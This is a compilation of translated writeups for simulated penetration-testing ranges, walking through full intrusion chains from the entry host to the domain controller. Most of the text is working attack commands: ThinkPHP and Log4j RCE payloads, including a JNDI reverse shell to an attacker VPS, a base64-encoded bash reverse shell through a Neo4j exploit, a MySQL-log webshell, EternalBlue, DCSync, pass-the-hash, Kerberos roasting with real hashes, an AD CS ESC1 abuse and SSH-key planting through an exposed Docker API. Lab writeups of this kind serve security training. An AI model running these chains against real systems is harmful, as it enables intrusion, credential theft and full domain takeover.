There is a secret.zip in the Lumia user folder on 172.22.3.26. Direct PTH. Exchange exports all emails and attachments in the Lumia mailbox; item-0.eml hints that the password is a mobile phone number. There is a CSV in the exported attachments full of mobile phone numbers. Routine operation: convert the zip to a pkzip-format hash, run the dictionary against it, and the password comes out. flag03.

0x06 Outro
After Exchange, the author's original intention was for us to use NTLM relay to complete the DCSync escalation: obtain Exchange SYSTEM permissions and trigger WebDAV to relay to LDAP. If you are interested, read my previous article, Spoofing. 2. Lumia user logs in to Exchange: the author also wanted us to change the Lumia user's password, but I was lazy. Direct PTH.
Original link: https://www.anquanke.com/post/id/286967
-
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Initial writeup
After starting the target machine there is a login interface with a ThinkPHP icon. Test it directly: the 5.0.23 RCE exists. Check the environment: PHP 7.4.3. Take a look at disable_functions:
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_weexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare
Upload immediately; the AntSword connection has www-data permissions, so we have to find a way to escalate privileges and enter /root. I found some articles from an official account I followed before; the Web Security Tools Library is quite complete, 《Linux提权备忘录》 (Linux privilege escalation cheat sheet). Trying cat /etc/sudoers gives Permission denied; switch to sudo -l to view. That site shows the privilege escalation can be done through mysql:
sudo mysql -e '\! cat /root/flag/flag01.txt'
This gives the first part of the flag. ifconfig to check the IP. Upload fscan and scan the C segment: ./fscan_amd64 -h 172.22.1.1/24; the result is in result.txt in the current directory:
172.22.1.18:3306 open
172.22.1.2:88 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] 172.22.1.21 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] NetInfo:
[*]172.22.1.21
   [-]XIAORANG-WIN7
   [-]172.22.1.21
[+] NetInfo:
[*]172.22.1.18
   [-]XIAORANG-OA01
   [-]172.22.1.18
[+] NetInfo:
[*]172.22.1.2
   [-]DC01
   [-]172.22.1.2
[*] 172.22.1.2 [+]DC XIAORANG\DC01 Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.1.15 code:200 len:5578 title3:Bootstrap Material Admin
[*] 172.22.1.18 XIAORANG\XIAORANG-OA01 Windows Server 2012 R2 Datacenter 9600
[*] 172.22.1.21 __MSBROWSE__\XIAORANG-WIN7 Windows 7 Professional 7601 Service Pack 1
[*] WebTitle:http://172.22.1.18 code:302 len:0 title:None Jump url: http://172.22.1.18?m=login
[*] WebTitle:http://172.22.1.18?m=login code:200 len:4012 title:Sign call collaborative office system
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
.15 does not need to be looked at; .21 is a Win7 with EternalBlue; .18 is a XinHu OA system; and .2 is the domain controller. Forward with an NPS + Proxifier proxy and look at .18 first. There are then two ways to do it. The first targets a file upload vulnerability in XinHu OA; you can refer to Master Y4tacker's article: log in with the weak password admin/admin123 and run the exploit. The second is to log in to /phpmyadmin directly as root/root and write a webshell through the logs:
Step one: execute show variables like 'general%'; to check whether the log is enabled and where it is stored.
Step two: set global general_log=ON; to turn the log on.
Step three: set global general_log_file to set the log save location.
Finally: select '<?php eval($_POST[cmd]);'; writes the shell; then connect with AntSword. The flag is under C:/Users/Administrators/flag.
Next, .21 is a Win7 machine, so MS17-010 applies. After trying, it cannot reach out to the network, so use a bind (forward) listener. First hang the proxy: proxychains msfconsole to route traffic over socks5, then:
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
After obtaining a bind meterpreter shell, the next step is DCSync. You can refer to this article for an introduction to DCSync; its biggest feature is that it obtains data from the domain controller without logging in to it. Load kiwi directly in MSF, then kiwi_cmd 'lsadump::dcsync /domain:xiaorang.lab /all /csv' to export the hashes of all users in the domain. .2 was scanned earlier with port 445 open; pass the hash over SMB directly with the crackmapexec that comes with Kali:
proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x '$cmd'
The last part of the flag is under /Users/Administrators/flag.
Original link: http://119.45.47.125/index.php/2022/11/24/yunjing-4/
-
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Time-writeup
Instructions
Time is a range environment of medium difficulty. Completing it helps players understand proxy forwarding, intranet scanning, information gathering, privilege escalation and lateral movement in internal penetration, strengthens their understanding of the core authentication mechanism of a domain environment, and covers some interesting techniques of domain penetration. There are 4 flags, distributed across different hosts.

Techniques: Neo4j, Kerberos, privilege escalation, domain penetration

First flag

External IP information gathering (fscan):

    start infoscan
    (icmp) Target '39.98.236.25' is alive
    [*] Icmp alive hosts len is: 1
    39.98.236.25:22 open
    39.98.236.25:1337 open
    39.98.236.25:7474 open
    39.98.236.25:7473 open
    39.98.236.25:7687 open
    39.98.236.25:35555 open
    [*] alive ports len is: 6
    start vulscan
    Completed 0/6
    [-] webtitle http://39.98.236.25:7473 Get 'http://39.98.236.25:7473': net/http: HTTP/1.x transport connection broken: malformed HTTP response '\x15\x03\x03\x00\x02\x02P'
    [*] WebTitle:http://39.98.236.25:7474 code:200 len:145 title:None
    [*] WebTitle:http://39.98.236.25:7687 code:400 len:0 title:None
    [*] WebTitle:https://39.98.236.25:7687 code:400 len:0 title:None
    Completed 6/6
    scan end

Neo4j unauthenticated RCE (CVE-2021-34371)
Neo4j is an open-source graph database. In Neo4j 3.4.18 and earlier, if the Neo4j Shell interface is enabled, an unauthenticated attacker can call arbitrary methods over the RMI protocol, and the setSessionVariable method has a deserialization vulnerability. Because this is not RMI-level deserialization, it is not affected by the Java version. In Neo4j 3.5 and later, Neo4j Shell was replaced by Cypher Shell.

    https://github.com/zwjjustdoit/CVE-2021-34371.jar
    java -jar rhino_gadget.jar rmi://39.98.236.25:1337 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3R.NC81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}'

This gives a reverse shell; locate the flag file to get the first flag.

Second flag

Intranet penetration
Upload the proxy client and fscan:

    start infoscan
    Completed 0/0
    listen ip4:icmp 0.0.0.0: socket: operation not allowed
    trying RunIcmp2
    The current user permissions unable to send icmp packets
    start ping
    (icmp) Target 172.22.6.12 is alive
    (icmp) Target 172.22.6.25 is alive
    (icmp) Target 172.22.6.38 is alive
    (icmp) Target 172.22.6.36 is alive
    [*] Icmp alive hosts len is: 4
    172.22.6.25:445 open
    172.22.6.12:445 open
    172.22.6.25:139 open
    172.22.6.12:139 open
    172.22.6.25:135 open
    172.22.6.12:135 open
    172.22.6.38:80 open
    172.22.6.36:22 open
    172.22.6.38:22 open
    172.22.6.36:7687 open
    172.22.6.12:88 open
    [*] alive ports len is: 11
    start vulscan
    [+] NetInfo: [*]172.22.6.25 [->]WIN2019 [->]172.22.6.25
    [+] NetInfo: [*]172.22.6.12 [->]DC-PROGAME [->]172.22.6.12
    [*] 172.22.6.12 [+]DC XIAORANG\DC-PROGAME Windows Server 2016 Datacenter 14393
    [*] 172.22.6.25 XIAORANG\WIN2019
    [*] 172.22.6.12 (Windows Server 2016 Datacenter 14393)
    [*] WebTitle:http://172.22.6.38 code:200 len:1531 title:backend login
    [*] WebTitle:https://172.22.6.36:7687 code:400 len:50 title:None
    Completed 11/11

SQL injection
http://172.22.6.38 is a login page. Capture the login request:

    POST /index.php HTTP/1.1
    Host: 172.22.6.38
    Content-Length: 30
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.22.6.38
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.22.6.38/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    Connection: close

    username=admin&password=1111111

Test it with sqlmap (process omitted):

    sqlmap -r 1.txt --dump -T oa_f1Agggg -D oa_db --batch

This yields the second flag. The database also has oa_admin and oa_users tables; collect the 500 usernames from the users table into a dictionary, username.txt.

Third flag

Domain user enumeration
In Kerberos AS-REQ authentication, when the principal given in cname does not exist, the KDC answers with KDC_ERR_C_PRINCIPAL_UNKNOWN. So even without domain credentials we can enumerate domain users from outside the domain through Kerberos pre-authentication:

    https://github.com/ropnop/kerbrute
    proxychains ./kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab username.txt -t 10

Running this through the proxy on Kali never succeeded and produced no results; the binary was copied to the entry host and run there, which did return results. There are 74 users in total; save them to user.txt.

AS-REP Roasting
If a domain user has the option "Do not require Kerberos preauthentication" set, an AS-REQ sent to port 88 of the domain controller gets an AS-REP back whose encrypted part can be recombined into the "Kerberos 5 AS-REP etype 23" format (hashcat mode 18200). That hash can then be cracked with hashcat or john to recover the user's plaintext password.
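The two Kerberos behaviours described above (KDC_ERR_C_PRINCIPAL_UNKNOWN for unknown users, an AS-REP with no pre-auth for roastable accounts) are what kerbrute userenum and GetNPUsers.py decide on. The following is an added example, not code from the writeup or from those tools: it classifies a KDC reply to an AS-REQ and, for an etype 23 AS-REP, rewrites the enc-part into the hashcat 18200 line. The messages it parses are minimal constructed DER, not captures from the range, and the usernames are placeholders.

```python
"""Classify a KDC reply to an AS-REQ (added example; messages below are constructed)."""
import struct

KDC_ERR_C_PRINCIPAL_UNKNOWN = 6   # client principal not found in the KDC database
KDC_ERR_CLIENT_REVOKED = 18       # account disabled or locked out
KDC_ERR_PREAUTH_REQUIRED = 25     # account exists and pre-authentication is enforced
APP_AS_REP, APP_KRB_ERROR = 0x6B, 0x7E   # [APPLICATION 11] and [APPLICATION 30]


def _tlv(tag: int, body: bytes) -> bytes:
    """Encode one DER TLV with a definite length (short or long form)."""
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    else:
        raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(raw)]) + raw
    return bytes([tag]) + length + body


def _read_tlv(buf: bytes, pos: int):
    """Decode the TLV at buf[pos]; returns (tag, body, position after it)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        k = first & 0x7F
        n = int.from_bytes(buf[pos:pos + k], "big")
        pos += k
    else:
        n = first
    return tag, buf[pos:pos + n], pos + n


def _field(seq_tlv: bytes, ctx: int) -> bytes:
    """Body of the context-specific [ctx] member inside a SEQUENCE TLV."""
    _, body, _ = _read_tlv(seq_tlv, 0)
    pos = 0
    while pos < len(body):
        tag, inner, pos = _read_tlv(body, pos)
        if tag == 0xA0 | ctx:
            return inner
    raise ValueError(f"field [{ctx}] missing")


def classify_as_response(resp: bytes, user: str, realm: str) -> dict:
    """Map the KDC's reply for `user` to exists / pre-auth / roastable hash."""
    tag, app, _ = _read_tlv(resp, 0)
    if tag == APP_AS_REP:
        enc = _field(app, 6)                              # KDC-REP enc-part [6] = EncryptedData
        _, etype_raw, _ = _read_tlv(_field(enc, 0), 0)    # EncryptedData etype [0]
        _, cipher, _ = _read_tlv(_field(enc, 2), 0)       # EncryptedData cipher [2]
        etype = int.from_bytes(etype_raw, "big")
        result = {"user": user, "exists": True, "preauth": False, "etype": etype, "hash": None}
        if etype == 23:  # RC4-HMAC: 16-byte checksum then ciphertext, the hashcat -m 18200 layout
            result["hash"] = f"$krb5asrep$23${user}@{realm}:{cipher[:16].hex()}${cipher[16:].hex()}"
        return result
    if tag != APP_KRB_ERROR:
        raise ValueError(f"unexpected Kerberos message tag 0x{tag:02x}")
    _, code_raw, _ = _read_tlv(_field(app, 6), 0)         # KRB-ERROR error-code [6]
    code = int.from_bytes(code_raw, "big")
    return {"user": user, "exists": code != KDC_ERR_C_PRINCIPAL_UNKNOWN, "preauth": True, "error": code}


# Constructed minimal messages for offline use (a real KDC also sends stime, cname, a ticket, ...)
def _int(v: int) -> bytes:
    return _tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big"))


def _ctx(n: int, body: bytes) -> bytes:
    return _tlv(0xA0 | n, body)


def _seq(*items: bytes) -> bytes:
    return _tlv(0x30, b"".join(items))


def make_krb_error(code: int, realm: str = "XIAORANG.LAB") -> bytes:
    return _tlv(APP_KRB_ERROR, _seq(_ctx(0, _int(5)), _ctx(1, _int(30)), _ctx(6, _int(code)),
                                    _ctx(9, _tlv(0x1B, realm.encode()))))


def make_asrep(cipher: bytes, etype: int = 23) -> bytes:
    enc_part = _seq(_ctx(0, _int(etype)), _ctx(2, _tlv(0x04, cipher)))
    return _tlv(APP_AS_REP, _seq(_ctx(0, _int(5)), _ctx(1, _int(11)), _ctx(6, enc_part)))


if __name__ == "__main__":
    for name, msg in (("nobody", make_krb_error(KDC_ERR_C_PRINCIPAL_UNKNOWN)),
                      ("zhangsan", make_krb_error(KDC_ERR_PREAUTH_REQUIRED)),
                      ("testuser", make_asrep(bytes(range(16)) + b"\xaa" * 40))):
        print(classify_as_response(msg, name, "XIAORANG.LAB"))
```

An etype 18 AS-REP (AES256) is still "exists, no pre-auth", but it belongs to a different hashcat mode, so the function reports the etype and leaves the hash empty in that case.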
Find the accounts that do not require pre-authentication:

    proxychains python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/

Two accounts come back ([email protected] and [email protected]; the usernames are obscured in the source):

    [email protected]@XIAORANG.LAB:b6c410706b5e96c693b2fc61ee1064c3$2dc9fbee784e7997333f30c6bc4298ab5752ba94be7022e807af418c11359fd92597e253752f4e61d2d18a83f19b5c9df4761e485853a3d879bcf7a270d6f846683b811a80dda3809528190d7f058a24996aff13094ff9b32c0e2698f6d639b4d237a06d13c309ce7ab428656b79e582609240b01fb5cd47c91573f80f846dc483a113a86977486cecce78c03860050a81ee19921d3500f36ff39fa77edd9d5614cf4b9087d3e42caef68313d1bb0c4f6bc5392943557b584521b305f61e418eb0f6eb3bf339404892da55134cb4bf828ac318fe00d68d1778b7c82caf03b65f1938e54ed3fa51b63cdb2994
    [email protected]@XIAORANG.LAB:971802b84ce99050ad3c5f49d11fd0b7$6c1be075c3cf2a7695529de2ebbf39c5ec7e5326c9d891dac2107b239892f76befe52c860e4e1e2ff6537a5765a6bcb6b8baca792d60765ac0bbe1b3c5e59f3ec51b7426636a437d5df12130eb68d9b17ef431455415671c7331a17ce823e28cc411677bed341d3fceefc3451b8b232ea6039661625a5c793e30c4d149b2ed9d2926e9d825b3828744ebce69e47746994c9a749ceeb76c560a1840bc74d2b9f301bb5b870c680591516354460dab2238e7827900ed80320dd3a6f46874b1bc8a3a68aea7bd11d0683ec94103f59d9511691090928e98d0d8978f511e71fd9db0067fa0d450c120f3726918d7

Crack them with hashcat (mode 18200):

    hashcat -m 18200 --force -a 0 '[email protected]@XIAORANG.LAB:b6c410706b5e96c693b2fc61ee1064c3$2dc9fbee784e7997333f30c6bc4298ab5752ba94be7022e807af418c11359fd92597e253752f4e61d2d18a83f19b5c9df4761e485853a3d879bcf7a270d6f846683b811a80dda3809528190d7f058a24996aff13094ff9b32c0e2698f6d639b4d237a06d13c309ce7ab428656b79e582609240b01fb5cd47c91573f80f846dc483a113a86977486cecce78c03860050a81ee19921d3500f36ff39fa77edd9d5614cf4b9087d3e42caef68313d1bb0c4f6bc5392943557b584521b305f61e418eb0f6eb3bf339404892da55134cb4bf828ac318fe00d68d1778b7c82caf03b65f1938e54ed3fa51b63cdb2994' rockyou.txt
    hashcat -m 18200 --force -a 0 '[email protected]@XIAORANG.LAB:971802b84ce99050ad3c5f49d11fd0b7$6c1be075c3cf2a7695529de2ebbf39c5ec7e5326c9d891dac2107b239892f76befe52c860e4e1e2ff6537a5765a6bcb6b8baca792d60765ac0bbe1b3c5e59f3ec51b7426636a437d5df12130eb68d9b17ef431455415671c7331a17ce823e28cc411677bed341d3fceefc3451b8b232ea6039661625a5c793e30c4d149b2ed9d2926e9d825b3828744ebce69e47746994c9a749ceeb76c560a1840bc74d2b9f301bb5b870c680591516354460dab2238e7827900ed80320dd3a6f46874b1bc8a3a68aea7bd11d0683ec94103f59d9511691090928e98d0d8978f511e71fd9db0067fa0d450c120f3726918d7' rockyou.txt

This gives two sets of credentials: [email protected]/strawberry and [email protected]/hellokitty.

Domain environment analysis
Log in to 172.22.6.25 with a domain account and upload SharpHound to collect data:

    SharpHound.exe -c all

The export contains several JSON files describing the relationships in the domain. Import them into BloodHound, open Analysis and run "Find Shortest Paths to Domain Admins". Each edge reads from its thick end to its thin end as "X has this permission or relationship on Y". From the BloodHound graph, the next step runs through the user yuxuan.

Windows automatic logon
HasSession: a user has a session on a computer, so their credentials remain in memory; here it shows that yuxuan has logged on to WIN2019. Many users configure their computer to log on automatically, and MSF can read the stored auto-logon username and password. Build a bind-shell payload:

    msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe

Upload it to WIN2019 (172.22.6.25) and run it, then connect from msf through the proxy:

    use exploit/multi/handler
    set payload windows/meterpreter/bind_tcp
    set rhost 172.22.6.25
    run

Read the auto-logon password from the meterpreter session:

    run windows/gather/credentials/windows_autologin

I didn't manage to grab the password here and could not continue; I had to follow other people's writeups to go on.
Grabbing the password gives yuxuan/Yuxuan7QbrgZ3L, so yuxuan can now log in to WIN2019.

Pass the hash
HasSIDHistory: the user's SID history. After a user is migrated between domains, their tickets still carry the SIDs of the groups from the previous domain, so although the user no longer belongs to that domain, they keep its permissions. Use yuxuan to pull the Administrator hash:

    mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

SMB lateral movement to WIN2019 gives the third flag:

    proxychains crackmapexec smb 172.22.6.25 -u administrator -H 04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -x 'type Users\Administrator\flag\flag03.txt'

Original link: https://zhuanlan.zhihu.com/p/582525371
-
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Certify Writeup
Instructions
Certify is a range environment of medium difficulty. Completing it helps players understand proxy forwarding, intranet scanning, information gathering, privilege escalation and lateral movement in internal penetration, strengthens their understanding of the core authentication mechanism of a domain environment, and covers some interesting techniques of domain penetration. There are 4 flags, distributed across different hosts.

Techniques: Solr, AD CS, SMB, Kerberos, domain penetration

First flag

Log4j RCE
Scanning the external IP shows Solr, which ships a Log4j component. Test for RCE with a DNSLog probe:

    GET /solr/admin/cores?action=${jndi:ldap://1p9bvr.dnslog.cn} HTTP/1.1
    Host: 47.92.113.194:8983
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://47.92.113.194:8983/solr/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    Connection: close

DNSLog receives the lookup, so the JNDI injection works. Set up the reverse shell on the VPS:

    # serve the malicious class
    java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 47.103.xxx.xxx
    # listener
    nc -lvvp 5555

Payload: ${jndi:ldap://47.103.xxx.xxx:1389/Basic/ReverseShell/47.103.xxx.xxx/5555}

Send the request:

    GET /solr/admin/cores?action=${jndi:ldap://47.103.xxx.xxx:1389/Basic/ReverseShell/47.103.xxx.xxx/5555}&wt=json HTTP/1.1
    Host: 47.92.113.194:8983
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://47.92.113.194:8983/solr/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
    Connection: close

The shell comes back.

sudo privilege escalation
sudo -l shows grc can be run with sudo; grc's --pty option runs an arbitrary command:

    sudo -l
    sudo grc --help
    sudo grc --pty whoami
    sudo grc --pty find / -name 'flag*'
    sudo grc --pty cat /root/flag/flag01.txt

Second flag

Intranet penetration
Set up a proxy on the entry host and scan the intranet (details omitted: start an HTTP server, wget npc and fscan):

    172.22.9.13:445 open
    172.22.9.26:445 open
    172.22.9.47:445 open
    172.22.9.7:445 open
    172.22.9.26:139 open
    172.22.9.47:139 open
    172.22.9.7:139 open
    172.22.9.26:135 open
    172.22.9.13:139 open
    172.22.9.13:135 open
    172.22.9.7:135 open
    172.22.9.26:80 open
    172.22.9.47:80 open
    172.22.9.19:80 open
    172.22.9.47:22 open
    172.22.9.47:21 open
    172.22.9.19:22 open
    172.22.9.7:88 open
    172.22.9.19:8983 open
    [+] NetInfo: [*]172.22.9.13 [->]CA01 [->]172.22.9.13
    [*] 172.22.9.7 [+]DC XIAORANG\XIAORANG-DC
    [*] 172.22.9.26 XIAORANG\DESKTOP-CBKTVMO
    [+] NetInfo: [*]172.22.9.26 [->]DESKTOP-CBKTVMO [->]172.22.9.26
    [+] NetInfo: [*]172.22.9.7 [->]XIAORANG-DC [->]172.22.9.7
    [*] 172.22.9.13 XIAORANG\CA01
    [*] WebTitle:http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
    [*] WebTitle:http://172.22.9.19 code:200 len:612 title:Welcome to nginx!
    [*] 172.22.9.47 WORKGROUP\FILESERVER Windows 6.1
    [*] 172.22.9.47 (Windows 6.1)
    [*] WebTitle:http://172.22.9.19:8983 code:302 len:0 title:None Jump url: http://172.22.9.19:8983/solr/
    [*] WebTitle:http://172.22.9.26 code:200 len:703 title:IIS Windows Server
    [*] WebTitle:http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin

Assets discovered:

    172.22.9.19  entry host
    172.22.9.7   DC
    172.22.9.26  domain member
    172.22.9.47  file server
    172.22.9.13  CA

According to the hint, the file server should expose an SMB share. Note that fscan does not enumerate SMB shares, so use nmap:

    sudo grc --pty nmap -sT -A 172.22.9.47

Connect to the share with smbclient:

    proxychains smbclient \\\\172.22.9.47\\fileshare
    dir
    get personnel.db
    get secret\flag02.txt

This gives flag02 and another hint: "you have enumerated smb. But do you know what an SPN is?"
Third flag

The database file contains several usernames and passwords. RDP brute force:

    proxychains hydra -L user.txt -P pwd.txt 172.22.9.26 rdp -vV -e ns

Two valid accounts are found, but neither can log in remotely.

Kerberoasting
Use GetUserSPNs.py to find SPNs registered on domain user accounts and request their service tickets:

    proxychains python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian

Crack the hash offline; it is very fast. 1.txt holds the hash, rockyou.txt is the wordlist that ships with Kali:

    hashcat64.exe -m 13100 1.txt rockyou.txt

This gives zhangxia/MyPass2@@6, which can log in remotely. Because it is a domain account, the username must be given in the form [email protected]. After logging in, the Administrator directory is not accessible, because this account does not have administrator rights.

AD CS ESC1
Use Certify.exe to locate vulnerable templates:

    Certify.exe find /vulnerable

ESC1 prerequisites:

    msPKI-Certificate-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT
        Users who request a certificate from this template can request it for another user, i.e. for any user, including the domain administrator.
    PkiExtendedKeyUsage: Client Authentication
        Certificates issued from this template can be used to authenticate to Active Directory.
    Enrollment Rights: NT Authority\Authenticated Users
        Any authenticated user in Active Directory may request certificates from this template.

Request a certificate for the domain administrator:

    Certify.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:'XR Manager' /altname:XIAORANG.LAB\Administrator

Convert the format:

    openssl pkcs12 -in cert.pem -keyex -CSP 'Microsoft Enhanced Cryptographic Provider v1.0' -export -out cert.pfx

Request a TGT and pass the ticket. No password was set when exporting the certificate, so the password is left blank:

    Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password: /ptt

With the domain administrator's ticket in memory, export the hash:

    mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

Pass the hash to 172.22.9.26:

    proxychains crackmapexec smb 172.22.9.26 -u administrator -H 2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x 'type Users\Administrator\flag\flag03.txt'

Fourth flag

Pass the h   ash to the DC (the LM half of -hashes is 32 zeros):

    proxychains python3 wmiexec.py -hashes 00000000000000000000000000000000:2f1b57eefb2d152196836b0516abea80 [email protected]

Original link: https://zhuanlan.zhihu.com/p/581487685
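The ESC1 prerequisites listed above can be checked mechanically from a template's LDAP attributes. The following is an added example, not code from the writeup or from Certify: it applies the three prerequisites above together with the two further conditions that an ESC1 chain also needs (no CA manager approval, no authorized signatures). The template dicts are constructed; "XR Manager" mirrors the template described in the writeup, the other two are hypothetical variants, and the domain SID prefix is a placeholder.

```python
"""Flag ESC1-vulnerable AD CS templates from their LDAP attributes (added example)."""

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: CA manager approval

# EKUs that make the issued certificate usable for AD (PKINIT) authentication
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Well-known low-privilege SIDs (Everyone, Authenticated Users, BUILTIN\Users)
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}
# Domain-relative RIDs matched by suffix (Domain Users, Domain Computers)
LOW_PRIV_RIDS = {"513", "515"}


def _is_low_priv(sid: str) -> bool:
    return sid in LOW_PRIV_SIDS or sid.rsplit("-", 1)[-1] in LOW_PRIV_RIDS


def esc1_findings(template: dict) -> list:
    """Which ESC1 conditions a template meets; all five together make it exploitable."""
    findings = []
    if template.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.append("ENROLLEE_SUPPLIES_SUBJECT: requester picks the subject/SAN")
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    if not ekus or ekus & AUTH_EKUS:  # no EKU at all means the cert is valid for any purpose
        findings.append("EKU permits client authentication")
    if not template.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS:
        findings.append("no manager approval required")
    if template.get("msPKI-RA-Signature", 0) == 0:
        findings.append("no authorized signature required")
    if any(_is_low_priv(sid) for sid in template.get("enrollment-rights", [])):
        findings.append("low-privileged principals hold enrollment rights")
    return findings


def is_esc1(template: dict) -> bool:
    # The template is assumed to be published on a CA; an unpublished one cannot be enrolled.
    return len(esc1_findings(template)) == 5


def audit(templates) -> list:
    """Names of the ESC1-vulnerable templates, what `Certify.exe find /vulnerable` reports."""
    return [t["name"] for t in templates if is_esc1(t)]


# Constructed sample templates (S-1-5-21-1-2-3 is a placeholder domain SID)
XR_MANAGER = {
    "name": "XR Manager",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enrollment-rights": ["S-1-5-21-1-2-3-513", "S-1-5-11"],
}
# Same template with the subject flag cleared: the CA builds the subject from AD, so /altname is ignored
XR_MANAGER_FIXED = dict(XR_MANAGER, name="XR Manager (fixed)",
                        **{"msPKI-Certificate-Name-Flag": 0})
# Same template but requests pend for CA manager approval instead of issuing immediately
APPROVAL_REQUIRED = dict(XR_MANAGER, name="Approval Required",
                         **{"msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS})

if __name__ == "__main__":
    print(audit([XR_MANAGER, XR_MANAGER_FIXED, APPROVAL_REQUIRED]))  # ['XR Manager']
```

Either fix shown (clearing ENROLLEE_SUPPLIES_SUBJECT, or requiring manager approval) breaks the chain on its own, which is why the check requires all five conditions rather than scoring them.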
-
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Unauthorized Writeup
Instructions
Unauthorized is a range environment of medium difficulty. Completing it helps players understand proxy forwarding, intranet scanning, information gathering, privilege escalation and lateral movement in internal penetration, strengthens their understanding of the core authentication mechanism of a domain environment, and covers some interesting techniques of domain penetration. There are 3 flags, distributed across different hosts.

Techniques: FTP, privilege escalation, AD CS, Kerberos, domain penetration

First flag

Docker API unauthenticated access
External information gathering shows an unauthenticated Docker daemon API (reference: https://cloud.tencent.com/developer/article/1744943).

List the images:

    docker -H tcp://47.92.7.138:2375 images

List the containers:

    docker -H tcp://47.92.7.138:2375 ps -a

Start a container with the host's root filesystem mounted at /mnt:

    docker -H tcp://47.92.7.138:2375 run -it -v /:/mnt --entrypoint /bin/bash ubuntu:18.04

Write an SSH public key
Generate a key pair on the VPS. ssh-keygen prompts three times: first for the file name (id_rsa by default; enter another name if you want to change it), then for a passphrase and its confirmation, which would be required every time the key is used. A passphrase is usually left empty; set one if you have stronger security needs. Two files result: id_rsa (private key) and id_rsa.pub (public key).

    ssh-keygen -t rsa

Write the public key into /root/.ssh/authorized_keys on the host, through the mounted filesystem:

    cd /mnt/root/.ssh/
    echo 'ssh-rsa AAAAB3NzaC1yc2..' >> authorized_keys

